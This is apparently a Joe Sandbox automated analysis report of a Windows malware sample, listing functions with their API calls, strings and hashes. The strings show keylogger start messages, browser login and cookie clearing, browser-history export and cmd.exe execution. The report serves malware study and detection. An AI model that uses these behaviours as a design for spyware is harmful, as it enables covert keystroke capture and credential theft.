                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                              • Opcode Fuzzy Hash: 117f3a8dcb765dec107e638207eed2dfcae5ace0fe68797d76a2064f9764c662
                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                              Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "$8>G
                              • API String ID: 368326130-2663660666
                              • Opcode ID: ee8b26b7837f5fcebf18eb8c7331d6665d09625d2070b162a5bc37d97d6aa574
                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                              • Opcode Fuzzy Hash: ee8b26b7837f5fcebf18eb8c7331d6665d09625d2070b162a5bc37d97d6aa574
                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                              Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTimewsprintf
                              • String ID: Offline Keylogger Started
                              • API String ID: 465354869-4114347211
                              • Opcode ID: f84189ef53ccdab2324cea7e4949fa979c3031c86b7221add979e4ad61b2c385
                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                              • Opcode Fuzzy Hash: f84189ef53ccdab2324cea7e4949fa979c3031c86b7221add979e4ad61b2c385
                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                              Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTime$wsprintf
                              • String ID: Online Keylogger Started
                              • API String ID: 112202259-1258561607
                              • Opcode ID: 6342d03d0c9a2cdc3ce349886319e248d88a10a607891716496075ed72338117
                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                              • Opcode Fuzzy Hash: 6342d03d0c9a2cdc3ce349886319e248d88a10a607891716496075ed72338117
                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                              Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                              • __dosmaperr.LIBCMT ref: 0044AAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID: `@
                              • API String ID: 2583163307-951712118
                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                              Function 00419E89 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: TUF$alarm.wav$xIG
                              • API String ID: 1174141254-2188790166
                              • Opcode ID: 5ab373a09f9b49e7ca49f4ef29822fbe7d49cf7a1595be203e0675d8e7e95e86
                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                              • Opcode Fuzzy Hash: 5ab373a09f9b49e7ca49f4ef29822fbe7d49cf7a1595be203e0675d8e7e95e86
                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                              Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection Timeout
                              • API String ID: 2055531096-499159329
                              • Opcode ID: e4aafb68730189f051766cfe717f4579ae2cf6b1a1b95cb5a966786d982b9e87
                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                              • Opcode Fuzzy Hash: e4aafb68730189f051766cfe717f4579ae2cf6b1a1b95cb5a966786d982b9e87
                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                              Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                              • String ID: bad locale name
                              • API String ID: 3628047217-1405518554
                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                              Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: a499c4d5e5c154c23b09534d8e104b1b0afd7b6871b6321b4072401f19f2a66d
                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                              • Opcode Fuzzy Hash: a499c4d5e5c154c23b09534d8e104b1b0afd7b6871b6321b4072401f19f2a66d
                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                              Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                              Download Yara Rule
                              APIs
                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: TerminateThread$HookUnhookWindows
                              • String ID: pth_unenc
                              • API String ID: 3123878439-4028850238
                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                              Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __alldvrm$_strrchr
                              • String ID:
                              • API String ID: 1036877536-0
                              • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                              • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                              Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                              • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                              Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                              • String ID:
                              • API String ID: 3360349984-0
                              • Opcode ID: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                              • Opcode Fuzzy Hash: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                              Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                              • API String ID: 3472027048-1236744412
                              • Opcode ID: f93b6b6c96551599ebd69fe64bee0d63dad0637a340ebfcf96dabdaa3587bf98
                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                              • Opcode Fuzzy Hash: f93b6b6c96551599ebd69fe64bee0d63dad0637a340ebfcf96dabdaa3587bf98
                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                              Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQuerySleepValue
                              • String ID: @CG$exepath$BG
                              • API String ID: 4119054056-3221201242
                              • Opcode ID: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                              • Opcode Fuzzy Hash: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                              Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: SystemTimes$Sleep__aulldiv
                              • String ID:
                              • API String ID: 188215759-0
                              • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                              • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                              • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                              • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                              Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
